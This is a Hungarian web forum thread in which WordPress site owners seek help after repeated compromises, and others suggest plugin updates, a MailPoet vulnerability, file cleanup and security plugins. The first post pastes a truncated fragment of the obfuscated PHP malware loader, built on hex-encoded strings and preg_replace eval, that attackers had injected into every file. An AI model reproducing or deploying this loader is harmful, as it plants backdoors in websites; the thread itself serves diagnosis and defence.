Rendszeres feltöréssorozat

Archívum 2006-2018.11.09 biztonsag
#1

Sziasztok!





Van egy kisebb problémám, amin már nem tudok úrrá lenni.





Van egy weboldalam, melyet folyamatosan próbálnak valamilyen úton-módon használhatatlanná tenni (ez egy közlekedési cég honlapja, szóval semmi extra):



Kezdetben az admin felületre próbáltak rendszeresen bejutni, ezért feltelepítettem a Wordfence plugint, azonban annyi IP-ről érkezett belépési kísérlet (a végén már az admin felhasználónevet is megtudták valahogy), hogy már “vártam a napot”, hogy mikor jutnak be. Erre további lépésként alkalmaztam a “Captha on login” nevű plugint, mellyel így sikerült orvosolni a problémát. 1 hónapig így nyugi volt, azonban most újabb támadássorozatot kaptunk:



Az összes fájl (kivétel nélkül) első sorába bekerült egy ilyen kód:




<br />
<?php $nzqcracsmh = '{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fe%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#Ipdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftm~j%x5c%x7825!!%x5c%x782400~:<h%xbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fe5)!gj!>%824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw685c2^1#p#%x5c%x782f#p#%x5c%x78%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c5c%x7825:n%x5c%x7825<#7827&6!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824so!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782fc%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2>}R;msv}.;%xx61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70fs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{h*^%x5c%x782f%x5c%x7825r%x5c%x7878s%x5c%x7825q%x5c%x%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBgj!<**2-4-bubE{h%x5c%x7825)sutcvt)ex5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft7824!%x5c%x7824yf%x5c%x78604%x5c%x78223}!+!#]y3g]61]y3f]63]y3:]68]y76%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x77825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsu]248L3P6L1M5]D2P4]D6#:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19278b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y1L1#%x5c%x782f#M5]DgP5]D6##bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x78276]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c%f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)3of:opjudovg<~%x5c%x5]y85]82]y76]62]y3:]84#-!OVMM*%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5cSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7787f%x5c%x787f%x5c%x787f<u%x5c%x782y76]72]y3d]51]y35]274]e_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SF]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df##L4]275L35c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x7ph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!82#!#]y84]275]y8L); }7825m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x782x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j81]y43]78]y33]65]y31]5%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%5V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f!tussx5c%x7824-%x5c%x7824gvodujpo!%%x7827jsv%x5c%x78256^#zsfvr#%x5c5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x782%x785cq%x5c%x78257**^#zsfvr5j:^<!%x5c%x7825w%x5c%x7860%x5#!#]y84]275]y83]273]y76]277##]y74]273]yace("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61fqmbdf)%x5c%x7825%x5c%x7824pmqyfA>2b%x5c%x7825!b%x5c%x7825Zb%x5c%x7825!*##>>X)!gjZb%x5c%x7825!**X)u]y85]273]y6g]273]y76]271]y7%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c#-!#~<%x5c%x7825h00#*hmg%x5c%x7825!j%x5c%x7825!|!x5c%x7824-%x5c%x7824y7%x5c%x78%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%5>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fhtj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfb%x5c%x7860msvd},;uqpuft%x5c%x78x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!!2p%x5c%x7825Z<^2%x5c%h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878::h%xj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x78275c%x7825w6Z6qp%x5c%x7825!|Z~!!3]248]y83]256]y81]265]y72]254]y76-%x5c%x7824y4%x5c%x7824-%x5c%x7#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,SUOSVUFS,6<*msv%x5c%x7825mjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ff_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x7825w6Z6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x*XAZASVu%x5c%x7825V<#65uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x:,,Bjg!)%x5c%x7825j:bge56+99386c6f+9f5d816:+78256!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osx7825wN;#-Ez-1H*WCw*[!%x5c%xx5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%8pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!11<!gps)%x5c%#!%x5c%x78j{hnpd#)tutjyf%x5c%x7860opjudovg%257-K)fujs%x5c%x7878X6%x57825c:>%x5c%x7825s:%x5c%x785c%x5c%x782c%x7825!*3>?*2b%x5c%x7825)gpf%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x787f!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%60hA%x5c%x7827pd%x5c%x%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]25]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5cj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*78257-C)fepmqnjA%x5c%x7827&6<.fY%x5c%x78256q%x5c%x78256<%x5c%x787fw6*%x5c%x787mjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7;%x5c%x7825!}&;!osvufs}%x5c%x787f;!opjudovg}k~~7-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787fepdfe{h+{d%x5c%x7825)+opjudovg+)!gs:~:%x5c%x782fh%x5c%x7825:<**#57]38y]41#-%x5c%x7825tdz*Wsfuv24-%x5c%x7824*>*4-125z>32<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~2f20QUUI7jsv%x5c%x78257UFH#%x%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%xy4:]82]y3:]62]y4c#!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%uf%x5c%x7860gvodujpo)##-!#~1<%x5c%x7825j=judovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvu%x785c}X%x5c%x7824!#]y76]277]y72]265]y39]2747824!>!tus%x5c%x7860s946:ce44#)zbssb!>!ssbnp78]K5]53]Kc#!#]D6M7]K3##]D6]28%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%xx7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhp*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7825)5:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5cf#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%9{d%x5c%x7825:osvufs:~928>>%x5c6#!bssbz)K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.985c%x7825)54l}%x5c%x782x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npdx5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opif((function_exists(A!osvufs!~<3,j%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!%141%x72%164") && (!isset($GLOBALS["%x61%156%x75%156%x65c%x7860ufh%x5c%x7860fmjgc%x7825-#jt0}Z;0]=]0#)2q%x585cq%x5c%x78257%x5c%x782f7#@#14+9**-)1%x5c%x782f2986+7*246767~6<Cw6<pd%x5c%x7825w6Z6!fyqmpef)#%x5c%x7824*!#]y3d]51]y35]256]825h>#]y31]278]y3e]81]c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o67R37,18R#>q%x5c%x7825V!2p%x5g)(0)%x5c%x782f+*0f(-!#]y7>>1*!%x5c%x7825b:>1<!fmtf!%x5c#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x7d]252]y74]256#<!%x5c%x7825gg1"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1; functi}-}!#*%x5c%x7825fdy!%x5eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x72f%x5c%x7825z>2*!%x5c%x78on fjfgg($n){return chr(ord($n)-1);} @error_reporting(0); preg_repl827)fepdof.)fepdof.%x5c%x7822178}527}88:}334}472%x5c%x7824x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}c%x782f7rfs%x5c%x78256<#o]1%x5c%x787825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfsx7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7#%x5c%x785cq%x5c%x7825)ufttTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%xx5c%x7825)m%x5c%x7825=*/(.*)/epreg_replacekuqvhwprox'; $frjhttgazi = explode(chr((196-152)),'8650,20,5620,21,8899,55,9443,52,9644,67,4028,45,6266,69,1353,65,1852,55,1798,54,6031,43,9061,40,6473,22,5598,22,5785,45,5349,53,4931,28,5737,48,2340,62,8693,55,2716,48,7394,50,6107,51,9822,35,7365,29,6554,50,5296,53,8806,31,844,56,8137,41,5830,70,3227,57,9006,29,6729,44,3798,35,3901,27,9991,27,4880,51,6871,70,2460,65,6840,31,5177,56,6941,60,9857,64,1584,50,5152,25,7066,61,5233,63,1131,40,7989,46,8954,25,783,61,1669,51,4730,31,5641,68,501,22,8588,62,7781,44,1418,61,8670,23,4593,37,1970,54,2525,41,338,33,8837,62,143,60,2275,65,738,45,1634,35,4468,35,7279,21,2646,70,6074,33,4761,70,9289,25,6196,29,0,42,4100,42,8518,70,6225,41,9921,70,9711,28,8240,45,4994,51,7654,64,8076,61,3060,59,6395,36,5900,66,5574,24,7906,23,2869,68,2764,48,592,58,4287,68,7632,22,273,65,89,54,6431,42,1312,41,650,54,8496,22,7001,65,8369,31,2112,68,473,28,8285,46,1751,47,7127,35,6773,67,3702,38,2812,35,3540,52,5402,42,6335,60,5109,43,9248,41,5444,69,9769,53,4142,24,8748,58,7718,23,8979,27,9185,63,4249,38,7825,60,4355,27,4959,35,3119,33,5045,33,3958,70,2402,58,244,29,2086,26,7162,68,4630,53,4533,60,10083,23,4831,49,1093,38,1520,64,3157,70,2566,22,1720,31,9739,30,6604,65,8400,26,4382,50,7444,54,3833,68,1171,44,5513,41,7885,21,4073,27,5078,31,523,69,3768,30,4503,30,7252,27,7741,40,4683,47,7566,66,9101,62,2847,22,7498,68,8035,41,9551,51,900,27,10018,65,371,45,3740,28,8331,38,5709,28,3658,44,927,31,1027,66,1907,63,9163,22,8426,70,8178,62,6495,59,7929,60,2233,42,2937,66,2024,62,704,34,9495,56,3592,66,4432,36,4166,22,3399,30,6669,60,416,57,7230,22,1215,58,9035,26,1479,41,5966,65,3429,55,5554,20,9340,30,3284,67,6158,38,3928,30,1273,39,958,69,9602,42,7300,65,3506,34,3351,48,42,47,9370,44,3003,57,2180,53,9414,29,9314,26,203,41,4188,61,3484,22,2588,58,3152,5'); $uylcxtrzbn=substr($nzqcracsmh,(66633-56527),(37-30)); if (!function_exists('kgxmwuhnik')) { function kgxmwuhnik($vrovmvrzgw, $opbammjfvh) { $uohtbzlasa = NULL; for($euzszigglq=0;$euzszigglq<br />

```<br />
Ennek eredménye, hogy egy nagy fehér üres oldal kapok az összes létező oldalon, még az admin felületen is (meglestem abban az állapotban a böngészőben az index.php forrását, mely egy deka sort sem tartalmazott).<br />
<br />
<br />
Ez a mizéria már péntek óta tart. Azóta minden nap arra kelek, hogy a weboldal nem elérhető és állítom vissza a biztonsági mentést és változtatom meg az FTP jelszót.<br />
<br />
<br />
Valakinek van valami ötlete, hogy mit lehetne ezzel tenni? Mert én már teljesen tanácstalan vagyok :(<br />
<br />
<br />
(WordPress 3.9.1)
#2

Ilyenkor általában az egyik plugin a hibás. Friss minden plugin?



Esetleg meg tudod kérdezni a szolgáltatódat is.

#3

Köszönöm a választ!





Igen, az összes plugin rendszeresen frissítve van és csak viszonylag népszerű pluginok vannak használva. Valamint egy saját készítésű plugin, de annak működése csak az admin felületre van kihatással, látogatói oldalról nincs szerepe.





A szolgáltatónk az egy érdekes történet, semmiben nem hajlandó segítséget nyújtani, sőt, inkább a feltörések miatt próbálnak rólunk pénzt lehúzni az ÁSZF megsértése miatt. De érdekes módon más szolgáltatóknál még soha nem jelentkeztek ilyen jellegű gondjaim, viszont amióta átköltöztettem hozzájuk kettő egymástól független honlapot, hosszabb rövidebb idő után mindkettőt elkezdték “támadni”, függetlenül attól, hogy Wordpress-es volt, vagy sem. A saját honlapom tárhely előfizetését ezért már 1 hete azonnali hatállyal felmondtam, azonban ez utóbi esetnél annyira nem egyszerű a helyzet, mert ilyen téren az a cég dönt, akié a honlap. Úgyhogy egyelőre ennél a szolgáltatónál kellene valahogy megoldani a gondot, de egyszerűen tippem sincs, hogy ezen fájlmódosítások ellen hogyan lehetne védekezni :frowning:

#4

Valóban, valami nem a legfrissebb lesz. Akár lehet sablon hiba is, főleg, ha timthumb-os régi verzió van beépítve.



Szolgáltatódnál (vagy akár ftp-n) kell lennie egy log-nak, amiből többet tudsz megtudni. Azt nézd meg, hogy fix ip címed van-e vagy nem, mert akkor akár ip-re (vagy ip tartományra) lehet szűkíteni, hogy ki férhet hozzá az adminhoz. Én amúgy az All In One WP Security bővítményét használom. Nemzetközi céges oldalt a konkurencia gyakran próbálja zaklatni, de immáron majdnem 1 éve teljesen jól véd. :slight_smile:



Van több hasznos cikk a témában ha gondolod:

  1. http://rotisoft.hu/blog/2012/11/14/wordpress-oldal-biztonsag/
  2. http://weboldalkeszitese.org/wordpress-telepitese/wordpress-biztonsag-tippek-es-trukkok-kezdoknek/
#5

Amikor először bejutottak ki is takarítottad? Előfordulhat, hogy valami nem oda való fájl újra meg újra beleírja a szemetet.

Itt írtam le részletesen a takarítási teendőket: http://www.tutorial.hu/mit-tehetek-ha-meghackeltek-a-wordpress-oldalam/

#6

Szia!



A Syska által említett log fájlt mindenképpen meg kell nézni, mert ott látszik, ha például url-en keresztül történik a feltörés. Már ha ott történik.



(A) kérdés: Ugye nem vírusos a géped és nem mentesz FTP jelszót sem? (Mert akkor felesleges változtatni az FTP-n, úgyis ellopják.)



Milyen bővítmények használsz? (Bár ha ellopják a jelszavad, megint mindegy mit használsz.)



Add meg a teljes log fájlt! Másold be ide. (Vagy pastebin-re) Mondjuk lefrissíted…vársz és amikor feltörik. Addig mi történik?



Elsőnek ki kell zárni az (A) kérdésben szereplő dolgot, mert lehet akármilyen biztonságos is a szerver, meg lehat bármilyen védett a weboldalad, ha az nem teljesül! (És lehet neked akár egy sima html fájlod is, azt is megfertőzik! CMS sem kell hozzá.)

#7

Köszönöm a sok választ, nem is számítottam ennyire :slight_smile:





@syska:



A sablon saját készítésű, nem hiszem, hogy ott lenne a hiba forrása.



Az adminhoz való hozzáférés korlátozása egy kicsit neccesebb téma, mert a honlap admin felületéhez 4 különböző helyről kell hozzáférni (a cég két telephelyéről, valamint kettőnk otthonából arra az esetre, ha azonnal ki kell rakni bármi féle közleményt, vagy forgalmi zavarról értesítést), viszont mind a 4 helyen dinamikus IP van. De mint említettem, az adminhoz való hozzáférés megoldottam a captha-val, ami egyelőre teljesen jól működik (bár ezt inkább lekopogom :slight_smile: ), mert azóta egy belépési kísérlet sem volt (mivel az a napi 70-80 próbálkozás mind fennakadt a captha-n). Remélem ez a jövőben is így lesz :slight_smile:



Ez az All In One WP Security elég szimpatikusnak tűnik, a hétvégén lecserélem a Wordfence-t erre egy kis időre próbaképpen. Megnézzük mit tud :slight_smile:



A cikkeket pedig köszönöm, mindenképpen átrágom magam rajta a napokban, amint lesz két perc szabadidőm :wink:





@Andrea:



Takarítást még nem végeztem. Csupán biztonsági mentést állítottam vissza. Valamint a Wordfence plugin állította vissza azokat a fájlokat, amikben eltérést talált. De megpróbálom akkor a teljes takarítást is, hátha :slight_smile:





@Lőrincz András:



Nem, a gépeink nem vírusosak. Rendszeresen vannak ellenőrizve eredeti, rendszeresen frissített Kaspersky-al, valamint az egyik AVG-vel. Az FTP jelszavak nincsenek mentve, azonban ennek ellenére is sikerült megbabrálniuk a dolgokat.



Az alábbi pluginokat használjuk:

  • Advanced Menu Widget

  • All In One SEO Pack

  • Better Backgrounds

  • Booking System (Booking Calendar)

  • Breadcrumb NavXT

  • Captcha on Login

  • Display Widgets

  • MailPoet Newsletters

  • Q and A Focus Plus FAQ

  • Visual Form Builder

  • Wordfence Security

  • Valamint egy saját fejlesztésű GTFS kezelő plugin az admin felülethez.
A log fájlok tartalmát még a mai nap délelőtt feltöltöm, csak most rohannom kell tovább.


S köszönöm még egyszer, hogy ennyien próbáltok segíteni!


#8

Vagy az All in One SEO Pack vagy pedig a Mailpoet (Wysija) levélküldő plugin adminisztrációs szintű hozzáférést biztosít a malware fertőzésnek. Tiltsd le a PHP upload lehetőséget a honlapodon. Töröld le a mailpoet theme mappájában található mailp könytárat. További részleteket írtam erről tegnap az oldalamon: http://pixelmarketing.hu/juliusi-leveleso-mailpoet-wysija-levelkuldo-plugin-serulekenyseg/ ; ezt pedig ma hajnalban írtam: http://pixelmarketing.hu/tamadasi-hullam-a-wordpress-oldalak-ellen/

#9

Akkor feltehetően megvan a MailPoet, mint elsődleges gyanúsított.

Az All in one security-ben van fájl figyelő, ami azonnal email-t küld ha beállítod, hogy xy fájl változott. Így elég gyorsan, 1-2 nap alatt lehet értesülni a gondról.

#10

Sziasztok!



Én is hasonló problémával küzdök… többedik oldalamat törik fel. A szolgáltató azt mondta, hogy az a megoldás, ha mindig a legfrissebb wp verzió van fent, most viszont egy olyan oldalt törtek fel, így úgy látom ez sem megoldás.



[font=arial, sans-serif;font-size:12.727272033691406px]/home/ftp/ddvitality/public_[/font][font=arial, sans-serif;font-size:12.727272033691406px]html/wp-content/themes/[/font][font=arial, sans-serif;font-size:12.727272033691406px]graphene/hostdata.php[/font]

[font=arial, sans-serif;font-size:12.727272033691406px]/home/ftp/ddvitality/public_[/font][font=arial, sans-serif;font-size:12.727272033691406px]html/wp-content/themes/[/font][font=arial, sans-serif;font-size:12.727272033691406px]graphene/systemcash.php[/font]



[font=arial, sans-serif;font-size:12.727272033691406px]ezt küldte a szolgáltató. Ebben az esetben akkor a sablon a hibás?[/font]



[font=arial, sans-serif;font-size:12.727272033691406px]Mit lehet tenni ezek ellen a feltörések ellen? [/font]



[font=arial, sans-serif;font-size:12.727272033691406px]Köszi szépen a segítséget![/font]

#11

Ezek a fájlok nincsenek a gyári sablonban. Lehet hiba a sablonban, de nem valószínű, hogy az a hibás.

A megoldás az, ha megcsinálod a biztonsági beállításokat akár bővítménnyel, akár .htaccess fájlban, korlátozod az admin hozzáférést, lehetőleg a saját ip-dre, stb.

#12

Megkértem a tárhely szolgáltatót, hogy tegyék vissza a legkorábbi még ép biztonsági mentés alapján az oldalt, viszont azt mondják, hogy már a 30 nappal ezelőtti is feltört, ennél régebbi mentésük meg már nincs. Ilyenkor mit lehet tenni?? Ki lehet valahogy “takarítani” a fileokat vagy újra kell csinálni az egész oldalt?

#13

volt fent itt is egyébként Wysija, szóval gondolom akkor az lehet a ludas…

#14

"Ki lehet valahogy “takarítani”

Magát a wp-t: http://www.tutorial.hu/mit-tehetek-ha-meghackeltek-a-wordpress-oldalam/

A rossz hír viszont az, hogy a wp-content mappát “egyesével” kell rendbetenned.

Letöltöd a bővítmények, sablon legfrissebb verzióját, törlöd a szerveren a feltörtet, feltöltöd helyette a letöltöttet.

Amit nem cserélsz, pl. uploads mappa, végignézed, hogy vannak-e ott olyan fájlok, amit nem te tettél oda (általában php fájlok fordulnak elő).

Végül nézz bele a tárhely lomtárába is, találkoztam már olyannal, hogy oda is volt elrejtve php fájl.

#15
  • nézd meg az adatbázisban, hogy készült-e olyan felhasználó, amit nem te hoztál létre, admin joggal. Készült? (Törölni kell, mert ugyan ott leszel a sok “munka” után…)
#16

Köszi a tippeket, sikerült “kitakarítanom” a fileokat, remélem teljesen, és feltettem az all in one security bővítményt. Bejön rendesen a főoldal, az admin felületen működik minden rendesen, viszont a főoldalról bármire kattintva a menüben, egy üres fehér lap jön be. A link rendesen megjelenik fent és az admin felületen az oldalaknál is megvan minden oldal rendesen a tartalommal.



Van valami ötletetek, hogy miért lehet ez a fehér lap? Mit kellene csinálnom, hogy működjön ez is?



Nagyon köszi az eddigi segítséget is!

#17

hmm . lehet, hogy elkiabáltam a dolgot azzal, hogy működik minden. Megváltoztattam most valamit a főoldali egyik widgetben és most már a főoldal helyett is a fehér lap jön fel. :frowning:

#18

Szia!



Kapcsold be a DEBUG módot, hogy mutassa a hibát. http://codex.wordpress.org/Debugging_in_WordPress

Oldal alján egy komplett példa wp-config.php ba kell tenni…



Ilyen fehér lap könnyen előjöhet, elég egy apró php szintaktikai hiba is van , pl. az aktiv sablonban. Át kell váltani gyári témára, és átnevezni a plugins mappát is. Akkor mi van.

#19

Megpróbáltam gyári sablonnal, plugins mappát átnevezve, de úgy sem történt semmi.

Bekapcsoltam a debugot és töltöttem le debug-os plugineket is, de nem tudom sajnos, hogy hol mutatja a hibát… :S

#20

Próbálj meg mindent újra feltölteni, az is lehet, hogy valamelyik fájl(ok)nál megszakadt a feltöltés, és az hibásan van fenn.